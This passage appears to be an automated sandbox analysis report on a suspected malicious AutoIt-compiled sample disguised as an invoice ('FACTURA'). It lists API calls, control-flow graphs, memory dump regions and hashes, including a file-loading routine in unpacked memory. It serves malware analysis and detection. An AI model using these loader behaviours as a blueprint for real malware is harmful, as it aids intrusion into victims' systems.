                                                                            • RegisterClassExW.USER32(00000030), ref: 00ED309E
                                                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED30AF
                                                                            • LoadIconW.USER32(000000A9), ref: 00ED30F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 975902462-1005189915
                                                                            • Opcode ID: b13e2c32276727bfc8df1c167add6f1a7a4a116b1dbb7092aa481fdf5849e569
                                                                            • Instruction ID: 874631ccd3d3a92ae96bba3e954f42b074b2613a4e182c41dfba61e5eb628cb3
                                                                            • Opcode Fuzzy Hash: b13e2c32276727bfc8df1c167add6f1a7a4a116b1dbb7092aa481fdf5849e569
                                                                            • Instruction Fuzzy Hash: 35314771841309AFDB01CFA4EC89ADEBBF0FB09711F1445AEE680E62A0D3B50589DF91
                                                                            Function 00ED3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00ED3074
                                                                            • RegisterClassExW.USER32(00000030), ref: 00ED309E
                                                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED30AF
                                                                            • LoadIconW.USER32(000000A9), ref: 00ED30F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 975902462-1005189915
                                                                            • Opcode ID: 052662d08b965b4f86ca901b5a2d2f552f20eb04a5b1af9b9079abd6279851dc
                                                                            • Instruction ID: cb0ecf1d0d29063ce2f8bec0bce4c6a246780af13dce9d46727e3f7680956971
                                                                            • Opcode Fuzzy Hash: 052662d08b965b4f86ca901b5a2d2f552f20eb04a5b1af9b9079abd6279851dc
                                                                            • Instruction Fuzzy Hash: 0621B4B191171CAFDB01DFA4E849ADDBBF4FB08B11F04416AFA11A62A0D7B14548AF91
                                                                            Function 0116D748 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1015 116d748-116d79a call 116d648 CreateFileW 1018 116d7a3-116d7b0 1015->1018 1019 116d79c-116d79e 1015->1019 1022 116d7b2-116d7be 1018->1022 1023 116d7c3-116d7da VirtualAlloc 1018->1023 1020 116d8fc-116d900 1019->1020 1022->1020 1024 116d7e3-116d809 CreateFileW 1023->1024 1025 116d7dc-116d7de 1023->1025 1026 116d82d-116d847 ReadFile 1024->1026 1027 116d80b-116d828 1024->1027 1025->1020 1029 116d86b-116d86f 1026->1029 1030 116d849-116d866 1026->1030 1027->1020 1032 116d890-116d8a7 WriteFile 1029->1032 1033 116d871-116d88e 1029->1033 1030->1020 1034 116d8d2-116d8f7 CloseHandle VirtualFree 1032->1034 1035 116d8a9-116d8d0 1032->1035 1033->1020 1034->1020 1035->1020
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0116D78D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                            • Instruction ID: 6cd30e94193fc6a9009949e643e139d3841c67e9653ea4f52f143a6e87402fee
                                                                            • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                            • Instruction Fuzzy Hash: 86511675A50208FBEF24DFE4DC89FDE7778AF48700F108554F64AEA180DB7596448B60
                                                                            Function 00ED39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1055 ed39d5-ed3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00ED3A03
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00ED3A24
                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00ED3A38
                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00ED3A41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 3778d1151b6a14f16cce2d10f32c6eac27acfe5f1d4850530d04f9ead6a93d7d
                                                                            • Instruction ID: f10f2b8264f7680ee7bd35e6f5cdc1ce4a258b8d25fde9532590f9552b4e6554
                                                                            • Opcode Fuzzy Hash: 3778d1151b6a14f16cce2d10f32c6eac27acfe5f1d4850530d04f9ead6a93d7d
                                                                            • Instruction Fuzzy Hash: 5CF03A705006987EEB3257636C08E2B3E7DD7CBF51B00006ABA00A21B0C2611805EBB0
                                                                            Function 00ED686A Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 260COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1056 ed686a-ed6891 call ed4ddd 1059 f0e031-f0e041 call f3955b 1056->1059 1060 ed6897-ed68a5 call ed4ddd 1056->1060 1064 f0e046-f0e048 1059->1064 1060->1059 1065 ed68ab-ed68b1 1060->1065 1066 f0e067-f0e0af call ef0db6 1064->1066 1067 f0e04a-f0e04d call ed4e4a 1064->1067 1069 f0e052-f0e061 call f342f8 1065->1069 1070 ed68b7-ed68d9 call ed6a8c 1065->1070 1075 f0e0b1-f0e0bb 1066->1075 1076 f0e0d4 1066->1076 1067->1069 1069->1066 1079 f0e0cf-f0e0d0 1075->1079 1080 f0e0d6-f0e0e9 1076->1080 1081 f0e0d2 1079->1081 1082 f0e0bd-f0e0cc 1079->1082 1083 f0e260-f0e263 call ef2d55 1080->1083 1084 f0e0ef 1080->1084 1081->1080 1082->1079 1087 f0e268-f0e271 call ed4e4a 1083->1087 1086 f0e0f6-f0e0f9 call ed7480 1084->1086 1090 f0e0fe-f0e120 call ed5db2 call f373e9 1086->1090 1093 f0e273-f0e283 call ed7616 call ed5d9b 1087->1093 1099 f0e122-f0e12f 1090->1099 1100 f0e134-f0e13e call f373d3 1090->1100 1107 f0e288-f0e2b8 call f2f7a1 call ef0e2c call ef2d55 call ed4e4a 1093->1107 1102 f0e227-f0e237 call ed750f 1099->1102 1109 f0e140-f0e153 1100->1109 1110 f0e158-f0e162 call f373bd 1100->1110 1102->1090 1112 f0e23d-f0e247 call ed735d 1102->1112 1107->1093 1109->1102 1119 f0e164-f0e171 1110->1119 1120 f0e176-f0e180 call ed5e2a 1110->1120 1118 f0e24c-f0e25a 1112->1118 1118->1083 1118->1086 1119->1102 1120->1102 1126 f0e186-f0e19e call f2f73d 1120->1126 1131 f0e1a0-f0e1bf call ed7de1 call ed5904 1126->1131 1132 f0e1c1-f0e1c4 1126->1132 1155 f0e1e2-f0e1f0 call ed5db2 1131->1155 1134 f0e1f2-f0e1f5 1132->1134 1135 f0e1c6-f0e1e1 call ed7de1 call ed6839 call ed5904 1132->1135 1137 f0e215-f0e218 call f3737f 1134->1137 1138 f0e1f7-f0e200 call f2f65e 1134->1138 1135->1155 1145 f0e21d-f0e226 call ef0e2c 1137->1145 1138->1107 1148 f0e206-f0e210 call ef0e2c 1138->1148 1145->1102 1148->1090 1155->1145
                                                                            APIs
                                                                              • Part of subcall function 00ED4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4E0F
                                                                            • _free.LIBCMT ref: 00F0E263
                                                                            • _free.LIBCMT ref: 00F0E2AA
                                                                              • Part of subcall function 00ED6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00ED6BAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                            • String ID: /v$>>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                            • API String ID: 2861923089-2462514854
                                                                            • Opcode ID: 5c061cd8b8bf2bb2b334186f69ccf772829e2ea893e0671308c0b34edd644011
                                                                            • Instruction ID: 346dcb266c6940fac749946203bbe38ce550e5e67ea67b23abd0188fd65d7fc4
                                                                            • Opcode Fuzzy Hash: 5c061cd8b8bf2bb2b334186f69ccf772829e2ea893e0671308c0b34edd644011
                                                                            • Instruction Fuzzy Hash: C8916D71D04219AFCF14EFA4CC819EDB7B8FF14310B10486AF815BB2A1DB74A906EB50
                                                                            Function 00ED407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1160 ed407c-ed4092 1161 ed416f-ed4173 1160->1161 1162 ed4098-ed40ad call ed7a16 1160->1162 1165 f0d3c8-f0d3d7 LoadStringW 1162->1165 1166 ed40b3-ed40d3 call ed7bcc 1162->1166 1169 f0d3e2-f0d3fa call ed7b2e call ed6fe3 1165->1169 1166->1169 1170 ed40d9-ed40dd 1166->1170 1179 ed40ed-ed416a call ef2de0 call ed454e call ef2dbc Shell_NotifyIconW call ed5904 1169->1179 1182 f0d400-f0d41e call ed7cab call ed6fe3 call ed7cab 1169->1182 1172 ed4174-ed417d call ed8047 1170->1172 1173 ed40e3-ed40e8 call ed7b2e 1170->1173 1172->1179 1173->1179 1179->1161 1182->1179
                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F0D3D7
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • _memset.LIBCMT ref: 00ED40FC
                                                                            • _wcscpy.LIBCMT ref: 00ED4150
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ED4160
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                            • String ID: Line:
                                                                            • API String ID: 3942752672-1585850449
                                                                            • Opcode ID: 1b238928703d20355998744d27262afd9fabc47d0c69dbf14ff7c1872a129a0c
                                                                            • Instruction ID: 295e46c5b24e8872f64a8d7c3de87ef351d8de2cb2dc10386ed3bdedc519277b
                                                                            • Opcode Fuzzy Hash: 1b238928703d20355998744d27262afd9fabc47d0c69dbf14ff7c1872a129a0c
                                                                            • Instruction Fuzzy Hash: A631ED71008708AFD321EB60DC46BEB77D8EB54300F10151FF284A22E2EB70A64ADB83
                                                                            Function 00EF541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1559183368-0
                                                                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                            • Instruction ID: bc777cb815d198b260199374b3e51be1e91865961acf5988622adb87a6702322
                                                                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                            • Instruction Fuzzy Hash: E451D972A00B0DDBCB248FA9DC406BE77A2AF61325F249729FB35B62D0D7709D509B40
                                                                            Function 0116F208 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0116F0F8: Sleep.KERNELBASE(000001F4), ref: 0116F109
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0116F374
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: S985LKZW0SDYU1L0HS2
                                                                            • API String ID: 2694422964-1167979699
                                                                            • Opcode ID: 062ace9728767f7a8471793a238ba19ea6f292abe6d7852fcce0d7332d296ff6
                                                                            • Instruction ID: 387fe1691568f86cae1b8cbeaf0e6ea7931cbb5c434feca1d5b7a531716ec934
                                                                            • Opcode Fuzzy Hash: 062ace9728767f7a8471793a238ba19ea6f292abe6d7852fcce0d7332d296ff6
                                                                            • Instruction Fuzzy Hash: 90618331D04249DBEF15DBA4D8547EEBB79EF19304F004199E608BB2C0D7BA1B46CBA6
                                                                            Function 00ED35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00ED35A1,SwapMouseButtons,00000004,?), ref: 00ED35D4
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00ED35A1,SwapMouseButtons,00000004,?,?,?,?,00ED2754), ref: 00ED35F5
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00ED35A1,SwapMouseButtons,00000004,?,?,?,?,00ED2754), ref: 00ED3617
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: d0cc4b8f7c03efaf093b15a4f048d2eda5bbd1a2aa6d8434e75010384cef9c07
                                                                            • Instruction ID: 544e81d99fe056564ea4e4d4c0f456ec8bdffaf20db245db9c580cb7ec479b4e
                                                                            • Opcode Fuzzy Hash: d0cc4b8f7c03efaf093b15a4f048d2eda5bbd1a2aa6d8434e75010384cef9c07
                                                                            • Instruction Fuzzy Hash: 28113675910208BADB20CF64DC40EAABBA8EF04744F0054AAA905E7250D2719E46A761
                                                                            Function 00F3955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED4EE5: _fseek.LIBCMT ref: 00ED4EFD
                                                                              • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39824
                                                                              • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39837
                                                                            • _free.LIBCMT ref: 00F396A2
                                                                            • _free.LIBCMT ref: 00F396A9
                                                                            • _free.LIBCMT ref: 00F39714
                                                                              • Part of subcall function 00EF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EF9A24), ref: 00EF2D69
                                                                              • Part of subcall function 00EF2D55: GetLastError.KERNEL32(00000000,?,00EF9A24), ref: 00EF2D7B
                                                                            • _free.LIBCMT ref: 00F3971C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID:
                                                                            • API String ID: 1552873950-0
                                                                            • Opcode ID: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                                                            • Instruction ID: 84514a6350e170be3073c7e2b470f046256e9fac3bd5fb3e6f6c9d47dcc61d47
                                                                            • Opcode Fuzzy Hash: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                                                            • Instruction Fuzzy Hash: CB514EB1D04218ABDF259F64CC81AAEBBB9EF48310F10049EF609A7391DB715A81CF58
                                                                            Function 00EF470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                            • Instruction ID: a399547b3d98ef312eb3382aaa059331d2b4bc6b20e906d6f20c44f945e9e450
                                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                            • Instruction Fuzzy Hash: 2A41C5B5B0078D9BDB1C9E69C8809BB7BA5EF413A4B14917EF619A76C0D770DD408B40
                                                                            Function 00ED7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F0EA39
                                                                            • 7574D0D0.COMDLG32(?), ref: 00F0EA83
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                              • Part of subcall function 00EF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF07B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: NamePath$7574FullLong_memset
                                                                            • String ID: X
                                                                            • API String ID: 3399031285-3081909835
                                                                            • Opcode ID: 4ef4b5105806c74500136919f1e071373a8fa131d3acfbc0a579c541c0990b47
                                                                            • Instruction ID: 6f1d31f1e65934a142adefd935e3411bc5b1dd4ac2cd91d22be16e67cb3141bb
                                                                            • Opcode Fuzzy Hash: 4ef4b5105806c74500136919f1e071373a8fa131d3acfbc0a579c541c0990b47
                                                                            • Instruction Fuzzy Hash: 2221C670A002489BCB119F94CC45BEE7BF9AF48710F00405AE548B7382DBB4594A9F91
                                                                            Function 00F38D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
